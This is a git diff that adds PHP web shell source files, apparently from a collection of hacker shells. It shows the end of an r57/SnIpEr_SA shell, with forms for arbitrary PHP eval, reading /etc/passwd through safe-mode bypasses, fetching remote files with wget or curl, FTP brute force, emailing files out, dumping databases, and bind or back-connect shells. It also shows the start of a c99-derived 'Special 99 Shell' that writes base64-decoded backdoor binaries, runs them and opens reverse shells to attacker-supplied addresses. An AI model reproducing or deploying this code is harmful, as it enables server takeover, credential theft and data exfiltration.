+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell  | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | ÊÚÑíÈ æÊØæíÑ ]---o</b></font></div></td></tr></table>".$f;
+
+
+$u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
+echo "<PRE>\n";
+if(empty($snn)){
+if(empty($_GET['snn'])){
+if(empty($_POST['snn'])){
+die("\nSnIpEr_SA");
+} else {
+$u1p=$_POST['snn'];
+}
+} else {
+$u1p=$_GET['snn'];
+}
+}
+
+$temp=tempnam($tymczas, "cx");
+
+if(copy("compress.zlib://".$snn, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>
+<B>".htmlspecialchars($u1p)."</B> ÚÝæÇ! ÇáãáÝ ÛíÑ ãæÌæÏ Çæ áíÓ áÏíß ÇáÕáÇÍíå ááÏÎæá.</CENTER></FONT>");
+}
+
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/SpecialShell_99.php.php.txt b/xakep-shells/PHP/SpecialShell_99.php.php.txt
new file mode 100644
index 0000000..3a3f703
--- /dev/null
+++ b/xakep-shells/PHP/SpecialShell_99.php.php.txt
@@ -0,0 +1,2822 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Tamamlandi!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>HATA!</b></font></br></br></br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="<b>".$_POST['backconnectip']."</b>Numarali ip uzerinden <b>".$_POST['backconnectport']." portundan baglanti kurulamadi! yeniden deneyiniz!</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Hata:</font> Baglanti saglanamiyor!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Hata:</font> Arkakapi sunucusuna baglanti saglanamiyor!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "Capian Pirates.OrG Special 99 Shell v1.0"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; 
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; 
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); 
+$login_txt = "Apache Error: Restricted File";
+$g3n_onaysiz_giris = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; 
+$donated_html = "";
+$donated_act = array(""); 
+$curdir = "./"; 
+
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
